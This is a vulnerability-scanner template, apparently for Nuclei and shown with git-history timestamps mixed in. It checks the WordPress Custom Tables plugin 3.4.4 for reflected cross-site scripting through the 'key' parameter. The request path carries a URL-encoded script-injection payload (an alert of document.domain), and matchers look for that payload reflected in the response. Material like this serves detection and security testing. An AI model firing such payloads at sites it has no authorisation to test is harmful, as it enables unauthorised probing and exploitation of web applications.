2021-07-16 01:28:45 +00:00
|
|
|
id: wp-custom-tables-xss
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: WordPress Custom Tables Plugin 3.4.4 - Reflected Cross Site Scripting (XSS)
|
|
|
|
author: daffainfo
|
|
|
|
severity: medium
|
|
|
|
description: WordPress custom tables Plugin 'key' Parameter Cross Site Scripting Vulnerability
|
|
|
|
reference: https://www.securityfocus.com/bid/54326/info
|
|
|
|
tags: wordpress,xss,wp-plugin
|
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
2021-07-20 23:36:53 +00:00
|
|
|
- '{{BaseURL}}/wp-content/plugins/custom-tables/iframe.php?s=1&key=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
2021-07-16 01:28:45 +00:00
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
words:
|
2021-07-20 23:36:53 +00:00
|
|
|
- "</script><script>alert(document.domain)</script>"
|
2021-07-16 01:28:45 +00:00
|
|
|
part: body
|
|
|
|
|
|
|
|
- type: word
|
|
|
|
part: header
|
|
|
|
words:
|
|
|
|
- text/html
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|